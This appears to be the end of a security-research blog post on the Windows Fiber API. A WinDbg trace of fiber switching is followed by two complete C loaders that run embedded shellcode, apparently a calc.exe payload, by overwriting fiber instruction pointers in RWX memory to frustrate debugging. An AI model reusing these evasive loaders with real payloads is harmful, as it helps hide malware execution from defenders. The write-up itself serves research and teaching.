When HotPotatoThree switches back to HotPotatoOne, the SwitchToFiberContext function restores the stack such that execution returns into the fiber after the call to SwitchToFiberContext.
Since HotPotatoOne called SwitchToFiber, the return back to HotPotatoOne from SwitchToFiber is done by returning from SwitchToFiberContext:
0:000> u rip-0x10
KERNELBASE!SwitchToFiberContext+0x1f0:
00007ffc`cdd82160 50 push rax
00007ffc`cdd82161 3441 xor al,41h
00007ffc`cdd82163 d9a800010000 fldcw word ptr [rax+100h]
00007ffc`cdd82169 498ba098000000 mov rsp,qword ptr [r8+98h] ; restore original rsp
00007ffc`cdd82170 c3 ret ; <- CURRENT RIP
00007ffc`cdd82170 c3 ret
0:000> dq rsp L1
000000c4`536ff6b8 00007ffc`cdd5ad03 ; Return to KernelBase!SwitchToFiber
0:000> t return into SwitchToFiber
Time Travel Position: 102:AA
KERNELBASE!SwitchToFiber+0x33:
00007ffc`cdd5ad03 4883c428 add rsp,28h
0:000> t step to the return instruction
Time Travel Position: 102:AB
KERNELBASE!SwitchToFiber+0x37:
00007ffc`cdd5ad07 c3 ret
0:000> dq rsp L1 see where we're returning to.... aaaand!
000000c4`536ff6e8 00007ff6`49e55a89
0:000> u poi(rsp)
FiberBlog!HotPotatoOne+0x79 [Source.cpp @ 54]: HELL yes! A return finally back into HotPotatoOne from HotPotatoThree
00007ff6`49e55a89 488b4508 mov rax,qword ptr [rbp+8]
00007ff6`49e55a8d 813839050000 cmp dword ptr [rax],539h
00007ff6`49e55a93 72ba jb FiberBlog!HotPotatoOne+0x3f (00007ff6`49e55a4f)
00007ff6`49e55a95 b808000000 mov eax,8
00007ff6`49e55a9a 486bc000 imul rax,rax,0
00007ff6`49e55a9e 488d0d737c0000 lea rcx,[FiberBlog!HOT_POTATOES (00007ff6`49e5d718)]
00007ff6`49e55aa5 488b0c01 mov rcx,qword ptr [rcx+rax]
00007ff6`49e55aa9 ff1551b50000 call qword ptr [FiberBlog!_imp_SwitchToFiber (00007ff6`49e61000)]
Phew.
Quite the long journey so far, but we did it!
Now for the fun part.
0x04: Misdirection
We've talked about how fibers are created, allocated, switched to, and where the initial instruction pointer lives in memory.
Let's put this all together to cause some debugging pain.
I give you:
Two methods to execute shellcode in a really weird way. ¯\_(ツ)_/¯
Method 1:
#include >Windows.h<
#include >stdio.h<
#define TEB_FIBERDATA_PTR_OFFSET 0x17ee
#define LPFIBER_RIP_OFFSET 0x0a8
// calc shellcode
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
typedef int(WINAPI* tRtlUserFiberStart)();
int main() {
HMODULE hMod = GetModuleHandleA("ntdll");
if (!hMod) { return -1; }
tRtlUserFiberStart lpRtlUserFiberStart = (tRtlUserFiberStart) GetProcAddress(hMod, "RtlUserFiberStart");
if (!lpRtlUserFiberStart) { return -1; }
_TEB* teb = NtCurrentTeb();
NT_TIB* tib = (NT_TIB*)teb;
void* pTebFlags = (void*)((uintptr_t)teb + TEB_FIBERDATA_PTR_OFFSET);
*(char*)pTebFlags = *(char*)pTebFlags | 0b100; // set the HasFiberData bit
LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!addr) {
return GetLastError();
}
RtlMoveMemory(addr, op, sizeof(op));
uintptr_t lpDummyFiberData = (uintptr_t)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x100);
*(LPVOID*)(lpDummyFiberData + LPFIBER_RIP_OFFSET) = addr; // store the shelcode address at the offset of the FiberContext RIP in the Fiber Data
//call qword ptr [ntdll!_guard_dispatch_icall_fptr (00007ffa`218b4000)] ds:00007ffa`218b4000={ntdll!guard_dispatch_icall_nop (00007ffa`217cfa80)}
__writegsqword(0x20, lpDummyFiberData); // set the FiberData pointer
lpRtlUserFiberStart();
}
Huge shoutout to s4r1n.
From my contribution to his repo
Method 2:
#include >Windows.h<
#include >stdio.h<
// calc shellcode
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
void dummy() {
puts("Hello Fiber from Dummy");
}
//https://github.com/reactos/reactos/blob/2e1aeb12dfd8b44b4b57d377b59ef347dfe3386e/dll/win32/kernel32/client/fiber.c
//https://doxygen.reactos.org/dd/d83/ndk_2ketypes_8h_source.html#l00179
// s/o to ch3rn0byl and s4r1n
// am I doing s00p3r c001 1337 gr33tz right?
int main() {
LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!addr) {
return GetLastError();
}
RtlMoveMemory(addr, op, sizeof(op));
_TEB* teb = NtCurrentTeb();
NT_TIB* tib = (NT_TIB*)teb;
//https://github.com/reactos/reactos/blob/2e1aeb12dfd8b44b4b57d377b59ef347dfe3386e/dll/win32/kernel32/client/fiber.c#L256
ConvertThreadToFiber(NULL);
LPVOID lpFiber = CreateFiber(0x100, (LPFIBER_START_ROUTINE)dummy, NULL);
if (lpFiber == NULL) {
printf("GLE : %d", GetLastError());
exit(0);
}
uintptr_t* tgtFuncAddr = (uintptr_t*)((uintptr_t)lpFiber + 0xB0);
*tgtFuncAddr = (uintptr_t)addr;
SwitchToFiber(lpFiber);
return 1;
}
Thank you for reading!
I hope at the very least you learned something neat about the Windows Fiber API.
Some great links:
https://nullprogram.com/blog/2019/03/28/
https://devblogs.microsoft.com/oldnewthing/20191011-00/?p=102989
s/o to all the cool as hell people in my life.
You know who you are.
🚀